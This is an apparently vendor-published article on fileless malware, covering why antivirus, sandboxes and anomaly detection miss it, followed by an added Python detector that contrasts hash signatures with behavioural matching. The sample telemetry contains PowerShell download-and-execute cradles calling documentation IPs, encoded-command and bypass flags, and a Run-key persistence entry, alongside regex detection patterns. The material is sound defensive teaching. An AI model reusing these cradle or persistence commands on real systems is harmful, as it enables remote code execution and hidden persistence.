Threat actors are increasing their use of fileless malware for one simple reason: most organizations aren’t prepared to detect it. Education is the first step in determining what threat these new attacks pose and what you can do to detect and stop fileless malware attacks.
Fileless malware is a significant and increasing threat. While awareness of that fact is growing, there’s still confusion among security practitioners and vendors about the nature of the threat and the requirements for a successful defense strategy.
Part of that confusion is because most of the security methods, solutions and routines used to detect and prevent cyber security threats remain firmly grounded in addressing file-based attacks. As with any new type of cyber threat, many security professionals need a point of reference, usually a newsworthy attack, as the driver for altering, updating or replacing their current security workflows.
The goal of every security organization is not to be the first victim of that attack.
A recent survey by Ponemon, the 2017 State of Endpoint Security Risk, showed that fileless attacks rose, as a percentage of all malware attacks, from 20% in 2016 to 29% in 2017, and estimated that they would rise to 35% in 2018. Of the 54% of respondents that indicated they had been compromised by at least one attack, 77% said those successful breaches were from fileless attacks.
The goal of this post is to empower you, the security professional, with the knowledge you can use to better understand, prepare for and detect fileless threats. In time, fileless malware threats will be commonplace. Educating yourself early can significantly enhance your security readiness today for better security tomorrow.
True fileless attacks exploit the target system without writing any file to disk. The entirety of the attack occurs in memory, leaving no trace of the attack on the file system. These attacks have been used in the delivery of all types of malicious content. To date, fileless attacks primarily focus on the exploitation of web browsers and their plug-ins.
These payloads may be fully memory-resident and use PowerShell for reconnaissance and lateral movement. Combining fileless exploitation techniques with memory-resident malware and living-off-the-land methods presents major challenges for traditional defensive techniques at both the network and host level.
Once the target is compromised, fileless attacks typically load their malicious payloads into already running system processes, where they can operate unnoticed until the system is powered down or rebooted. In most cases, fileless malware operates exclusively in RAM and leaves no artifacts on disk for post-event forensic analysis; what survives is only what a memory capture or process and script logging recorded while it ran. However, other fileless strains attempt to achieve persistence by writing files to hidden directories or by modifying the operating system registry.
Fileless attacks are often used as the initial vector for entering a system, disabling or circumventing tools used to detect more malicious file-based attacks. Once completed, these fileless attacks may move to a new stage which utilizes file-based methods. Thus, tools created to detect file-based attacks might incorrectly report that the initial attack was file-based if they catch the attack at all.
There is some confusion about what is and isn’t a fileless attack. Attacks should not be characterized as fileless if critical phases are transported within a file, such as a Word or Excel document containing a malicious macro or a zip file containing malicious code.
File-based threats like these are commonly associated with phishing exploits and weaponized attachments, which cannot infect a host unless the file is opened by an unwary user. The resulting malware may operate entirely in RAM or write and modify system files to achieve persistence or to compromise system resources. Some of these attacks may also leverage common system utilities, such as PowerShell, to move laterally within an organization without leaving evidence on the host file system.
These file-based attacks are sometimes miscategorized as fileless attacks because they do not produce files on the victim’s machine. However, they are better categorized as memory-resident malware or living-off-the-land attacks.
Organizations have adopted a range of defenses to protect their networks from malicious attacks: signature-based solutions such as anti-virus (AV) and firewalls, file sandboxes, host-based systems and anomaly detection. Most of these were designed to detect files or traditional threat attributes. Therefore, most don’t work against fileless attacks, and others only provide a partial or after-the-fact solution.
This section goes into detail about each of these types of defense and the capabilities and limitations of each. These solutions generally use a combination of file signatures (typically cryptographic hashes of known malicious files) and the URLs or IPs of known malicious or compromised systems. Fileless malware is designed to bypass these traditional defenses.
First, the lack of an actual file bypasses file signature-based detection, as there is no file from which to derive a signature. Therefore, even once the attack becomes known, it still bypasses signature-based detection. Second, attackers use a changing set of registered and compromised hosts as the point from which to launch their attack, which defeats IP- or URL-based blocking. This means the exact same attack can bypass these defenses again and again, just by changing the point of origin.
Anti-virus was designed to detect malicious, known threats through signatures. Fileless malware has no file to compare a signature to, and fileless attacks do not conform to a given signature. This combination allows fileless malware to slip right past AV detection.
Sandboxes are often included in traditional defenses as a second line for detecting threats missed by signatures. However, sandboxes are not effective against fileless attacks because they are only sent suspicious files. Since fileless attacks don’t have files, there is nothing to send for analysis.
Anomaly detection technologies can be effective at detecting anomalous behavior in systems that have already been compromised. However, these approaches generally fail to prevent the initial compromise and require significant abnormal activity in order to detect a breach.
Part of the problem is that fileless attacks are designed to look like normal traffic, so they often don’t show up as an anomaly. The detections from these solutions can also be lost in the noise, because they alert on all abnormal activity. The abnormal activity could be someone shopping for their spouse’s birthday on a company computer, the introduction of a new process or tool, or even a new hire.
This strategy relies on host-based defenses to protect the infrastructure. Many of these host solutions have started adding methods to detect fileless malware, but they have serious limitations:
Without signatures to detect fileless malware attacks, security systems fail to find these critical attack vectors early enough in the kill chain to prevent damage. Detecting fileless malware requires a very different kind of defense strategy. There are five major challenges that a solution needs to address in order to detect fileless attacks:
Finding fileless malware before the breach is not a simple task. A solution must be capable of detecting fileless malware regardless of OS, handle code obfuscation, operate at network speed, perform true analysis of the code, and do all of this in real time. Let’s take a second look at these five challenges while defining the requirements necessary to address them.
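The following is an added example, not code from the original article or from Blue Vector. It ties together three points made above: the registry-based persistence some fileless strains use, the failure of file-hash and origin-based signatures against a re-launched attack, and the requirement that a detector handle code obfuscation. It runs over constructed, Sysmon-style process-creation and registry-set records (hypothetical hosts, payload IPs from the TEST-NET documentation ranges, a made-up Run key value). A hash of the observed command line stands in for the file signature: it matches only the attack exactly as first seen, while decoding the -EncodedCommand payload and matching on behaviour catches both variants and the persistence entry, and leaves the benign PowerShell line alone.

```python
"""Behavioural detection of fileless PowerShell activity versus hash signatures.

Added example; all telemetry below is constructed and labelled as such.
"""
import base64
import hashlib
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# -e / -ec / -en / -enc / -EncodedCommand followed by a base64 token.
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Behavioural indicators, matched against the lower-cased raw text plus the
# decoded payload, so obfuscation via -EncodedCommand does not hide them.
INDICATORS = {
    "encoded_command": r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+[a-z0-9+/=]{16,}",
    "invoke_expression": r"\biex\b|invoke-expression",
    "download_cradle": r"downloadstring|downloadfile|net\.webclient|invoke-webrequest",
    "no_profile": r"(?:^|\s)-nop(?:rofile)?\b",
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "bypass_policy": r"-e(?:p|x(?:ec(?:utionpolicy)?)?)\s+bypass",
    "base64_decode": r"frombase64string",
}


@dataclass
class Finding:
    host: str
    source: str             # "process_create" or "registry_set"
    signature: str          # SHA-256 of the observed text: the "file hash" analogue
    decoded: Optional[str]  # payload recovered from -EncodedCommand, if any
    indicators: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Two independent behaviours keeps single-flag noise (e.g. -nop alone) down.
        return len(self.indicators) >= 2


def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the plaintext script from an -EncodedCommand argument, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def signature_hash(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def analyse_event(event: dict) -> Finding:
    raw = event["details"] if event["event"] == "registry_set" else event["command_line"]
    decoded = decode_encoded_command(raw)
    text = re.sub(r"\s+", " ", raw if decoded is None else raw + " " + decoded).lower()
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, text)]
    # A script stored under a Run key is the registry persistence the text describes.
    if event["event"] == "registry_set" and "\\currentversion\\run\\" in event["target_object"].lower():
        hits.append("run_key_persistence")
    return Finding(event["host"], event["event"], signature_hash(raw), decoded, hits)


def analyse(events: List[dict]) -> List[Finding]:
    return [analyse_event(e) for e in events]


def compare_approaches(events: List[dict]) -> Tuple[List[bool], List[bool]]:
    """Signature matching (hash of the attack as first seen) versus behavioural matching."""
    findings = analyse(events)
    known_bad = {findings[0].signature}
    return [f.signature in known_bad for f in findings], [f.suspicious for f in findings]


# Constructed sample telemetry (hypothetical hosts; 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges, not real attacker infrastructure).
CRADLE_A = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"
CRADLE_B = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
SAMPLE_EVENTS = [
    {"host": "ws01", "event": "process_create",
     "command_line": "powershell.exe -NoP -W Hidden -Exec Bypass -Enc " + encode_ps(CRADLE_A)},
    # Same attack, new origin and reordered flags: a different hash, same behaviour.
    {"host": "ws02", "event": "process_create",
     "command_line": "powershell.exe -w hidden -nop -ep bypass -e " + encode_ps(CRADLE_B)},
    {"host": "ws02", "event": "registry_set",
     "target_object": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "details": "powershell -w hidden -enc " + encode_ps(CRADLE_B)},
    {"host": "ws03", "event": "process_create",
     "command_line": 'powershell.exe -Command "Get-ChildItem C:\\Logs | Measure-Object"'},
]

if __name__ == "__main__":
    by_sig, by_beh = compare_approaches(SAMPLE_EVENTS)
    for f, s, b in zip(analyse(SAMPLE_EVENTS), by_sig, by_beh):
        print(f"{f.host:5} {f.source:15} signature_hit={s!s:5} behaviour_hit={b!s:5} {f.indicators}")
```

The signature column hits only the first record; the behavioural column hits the re-launched variant and the Run key entry as well, and nothing on the benign line. On a real host the same records come from Sysmon event IDs 1 and 13 or Windows event 4688 with command-line auditing, and PowerShell script block logging (event 4104) supplies the decoded script directly even when the command line was not captured.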
An article published by Blue Vector